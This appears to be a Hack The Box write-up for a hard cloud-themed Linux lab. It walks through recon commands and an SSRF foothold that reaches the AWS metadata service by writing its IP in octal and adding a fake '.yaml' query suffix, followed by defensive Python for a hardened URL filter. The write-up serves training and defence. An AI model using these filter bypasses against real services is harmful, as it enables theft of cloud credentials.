Hack The Box - HTB Nimbus Writeup - Hard - Weekly - June 21st, 2026
OS: Linux · Difficulty: Hard · Theme: Cloud / AWS (LocalStack) misconfiguration
| Target | <TARGET_IP> |
| Attacker (tun0) | <LHOST> |
| /etc/hosts | <TARGET_IP> nimbus.htb aws.nimbus.htb |
0. Setup & the MTU black-hole (do this first)
On the HTB VPN, tun0 defaults to MTU 1500 but the real path MTU to the target is ~1300. Oversized packets are silently dropped (no ICMP frag-needed), so small requests succeed while large ones hang forever. On the first solve a ~2.5 KB SQS send-message hung indefinitely while a tiny test went through instantly — pure MTU. Fix it up front so it never bites:
sudo ip link set dev tun0 mtu 1300
Confirm connectivity and set /etc/hosts:
echo "<TARGET_IP> nimbus.htb aws.nimbus.htb" | sudo tee -a /etc/hosts
Tooling: awscli (sudo apt install -y awscli), tmux, curl, python3.
1. Recon
nmap
nmap -sC -sV -p22,80 <TARGET_IP>
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.16
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-title: Nimbus — Internal Job Scheduler
vhosts / web
curl -s -o /dev/null -w "%{http_code}\n" http://nimbus.htb/ # 200, "Nimbus — Internal Job Scheduler"
curl -s -o /dev/null -w "%{http_code}\n" http://aws.nimbus.htb/ # 403 -> LocalStack AWS API endpoint
curl -s -o /dev/null -w "%{http_code}\n" http://nimbus.htb/jobs/preview # 405 -> needs POST
aws.nimbus.htb is discoverable via vhost fuzzing:
ffuf -u "http://nimbus.htb" -H "Host: FUZZ.nimbus.htb" \
-w /usr/share/wordlists/dirb/big.txt -fs 178
# aws [Status: 403, Size: 305]
2. Foothold — SSRF → IMDS credentials
POST /jobs/preview fetches a user-supplied url= server-side. The app:
- blocklists the literal IMDS IP 169.254.169.254, and
- applies a suffix filter expecting a .yaml-looking URL.
Bypass both:
- Encode the IMDS IP in octal: 169.254.169.254 → 0251.0376.0251.0376 (inet_aton accepts it; the string blocklist doesn't match).
- Append ?a=test.yaml so the suffix check passes while still hitting the IMDS path.
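The two filter flaws above from the defender's side, as an added example (not code from the box or from this writeup): naive_filter is an assumed reconstruction of the string-based check, and hardened_filter normalises the host the way inet_aton does and tests the suffix on the path only. Function names and sample URLs are constructed, and nothing is fetched.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

IMDS_LITERAL = "169.254.169.254"  # the literal the page says the app blocklists


def naive_filter(url: str) -> bool:
    """Assumed shape of the flawed check: substring blocklist + suffix test on the raw URL."""
    return IMDS_LITERAL not in url and url.endswith(".yaml")


def canonical_ip(host: str):
    """Numeric host -> ipaddress object as the resolver will see it, else None.

    socket.inet_aton follows inet_aton(3), so octal (0251), hex (0xa9) and
    short forms are normalised here instead of slipping past a string match.
    """
    try:
        return ipaddress.ip_address(socket.inet_aton(host))
    except OSError:
        pass
    try:
        return ipaddress.ip_address(host)  # IPv6 literal (urlsplit strips the brackets)
    except ValueError:
        return None


def hardened_filter(url: str) -> bool:
    """Allow only http(s) URLs whose path ends in .yaml and whose host is a global address."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if not parts.path.endswith(".yaml"):  # check the path, never the query string
        return False
    ip = canonical_ip(parts.hostname)
    if ip is not None:
        return ip.is_global  # rejects link-local (IMDS), loopback, private ranges
    try:  # real hostname: every address it resolves to must be global
        infos = socket.getaddrinfo(parts.hostname, None)
    except OSError:
        return False
    return all(ipaddress.ip_address(i[4][0].split("%")[0]).is_global for i in infos)


if __name__ == "__main__":
    # Constructed sample URLs; they are only parsed, never requested.
    for u in ("http://0251.0376.0251.0376/path?a=test.yaml", "http://8.8.8.8/jobs/nightly.yaml"):
        print(f"{u}\n  naive={naive_filter(u)} hardened={hardened_filter(u)}")
```

A check like this still has to be paired with connecting to the vetted address and refusing redirects, otherwise a hostname can resolve differently between validation and fetch.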